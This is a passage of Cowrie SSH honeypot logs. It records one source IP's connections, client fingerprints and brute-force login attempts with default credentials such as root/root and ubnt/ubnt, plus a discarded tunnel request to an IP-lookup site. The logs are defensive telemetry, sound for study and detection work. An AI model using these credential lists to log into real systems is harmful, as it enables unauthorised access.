openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T20:58:57.112457Z","src_ip":"212.227.235.229","session":"4b15490fe8c0"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T20:58:57.283793Z","src_ip":"212.227.235.229","session":"059c6386a55f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43138,"dst_ip":"1.2.3.4","dst_port":22,"session":"63e879b1de20","protocol":"ssh","message":"New connection: 212.227.235.229:43138 (1.2.3.4:22) [session: 63e879b1de20]","sensor":"my-vps","timestamp":"2025-08-26T20:58:59.098774Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T20:58:59.107062Z","src_ip":"212.227.235.229","session":"63e879b1de20"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T20:59:01.439264Z","src_ip":"212.227.235.229","session":"63e879b1de20"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43166,"dst_ip":"1.2.3.4","dst_port":22,"session":"c8f7ba72bc55","protocol":"ssh","message":"New connection: 212.227.235.229:43166 (1.2.3.4:22) [session: c8f7ba72bc55]","sensor":"my-vps","timestamp":"2025-08-26T20:59:08.873538Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T20:59:08.878590Z","src_ip":"212.227.235.229","session":"c8f7ba72bc55"}
{"eventid":"cowrie.login.success","username":"root","password":"@","message":"login attempt [root/@] succeeded","sensor":"my-vps","timestamp":"2025-08-26T20:59:08.917471Z","src_ip":"212.227.235.229","session":"4b15490fe8c0"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"ip-who.com","dst_port":80,"src_ip":"212.227.235.229","src_port":0,"message":"direct-tcp connection request to ip-who.com:80 from :0","sensor":"my-vps","timestamp":"2025-08-26T20:59:09.862455Z","session":"4b15490fe8c0"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"ip-who.com","dst_port":80,"data":"b'GET /json/ HTTP/1.1\\r\\nHost: ip-who.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to ip-who.com:80 with data b'GET /json/ HTTP/1.1\\r\\nHost: ip-who.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T20:59:10.856110Z","src_ip":"212.227.235.229","session":"4b15490fe8c0"}
{"eventid":"cowrie.session.closed","duration":"15.0","message":"Connection lost after 15.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:59:11.143050Z","src_ip":"212.227.235.229","session":"4b15490fe8c0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59338,"dst_ip":"1.2.3.4","dst_port":22,"session":"f7793fb0cb5c","protocol":"ssh","message":"New connection: 212.227.235.229:59338 (1.2.3.4:22) [session: f7793fb0cb5c]","sensor":"my-vps","timestamp":"2025-08-26T20:59:14.454846Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T20:59:14.457643Z","src_ip":"212.227.235.229","session":"f7793fb0cb5c"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T20:59:15.438145Z","src_ip":"212.227.235.229","session":"c8f7ba72bc55"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T20:59:16.540001Z","src_ip":"212.227.235.229","session":"f7793fb0cb5c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59304,"dst_ip":"1.2.3.4","dst_port":22,"session":"df0ec19f7050","protocol":"ssh","message":"New connection: 212.227.235.229:59304 (1.2.3.4:22) [session: df0ec19f7050]","sensor":"my-vps","timestamp":"2025-08-26T20:59:16.951080Z"}
{"eventid":"cowrie.login.failed","username":"ubnt","password":"ubnt","message":"login attempt [ubnt/ubnt] failed","sensor":"my-vps","timestamp":"2025-08-26T20:59:17.129468Z","src_ip":"212.227.235.229","session":"c8f7ba72bc55"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T20:59:17.486758Z","src_ip":"212.227.235.229","session":"df0ec19f7050"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T20:59:18.973686Z","src_ip":"212.227.235.229","session":"df0ec19f7050"}
{"eventid":"cowrie.session.closed","duration":"10.1","message":"Connection lost after 10.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:59:18.992738Z","src_ip":"212.227.235.229","session":"c8f7ba72bc55"}
{"eventid":"cowrie.login.failed","username":"root","password":"root","message":"login attempt [root/root] failed","sensor":"my-vps","timestamp":"2025-08-26T20:59:20.334364Z","src_ip":"212.227.235.229","session":"f7793fb0cb5c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46958,"dst_ip":"1.2.3.4","dst_port":22,"session":"be62c37d2b65","protocol":"ssh","message":"New connection: 212.227.235.229:46958 (1.2.3.4:22) [session: be62c37d2b65]","sensor":"my-vps","timestamp":"2025-08-26T20:59:21.983518Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T20:59:22.221313Z","src_ip":"212.227.235.229","session":"be62c37d2b65"}
{"eventid":"cowrie.session.closed","duration":"8.4","message":"Connection lost after 8.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:59:22.814383Z","src_ip":"212.227.235.229","session":"f7793fb0cb5c"}
{"eventid":"cowrie.login.failed","username":"support","password":"support","message":"login attempt [support/support] failed","sensor":"my-vps","timestamp":"2025-08-26T20:59:24.725128Z","src_ip":"212.227.235.229","session":"63e879b1de20"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512